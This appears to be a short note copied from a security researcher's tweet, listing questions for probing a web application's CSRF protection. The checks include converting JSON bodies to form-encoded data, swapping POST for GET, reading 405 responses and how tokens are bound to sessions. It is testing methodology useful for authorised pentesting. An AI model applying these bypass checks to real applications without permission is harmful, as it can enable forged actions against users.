https://twitter.com/Rhynorater/status/1585640808568348674?s=20&t=Z5fB7J704bmtvT6kvV2c2w
-
How is CSRF protection implemented? Does the application use only application/json content-type? Can you convert {"name":"Justin"} to name=Justin and change the content-type? Is CSRF token tied to account? Session? Are there any "unauthed" CSRF tokens? Can you switch POST -> GET? If not, what are you getting? If 405, then it is parsing the route, but GET is disallowed at this endpoint. Try other endpoints.
-
Is caching implemented?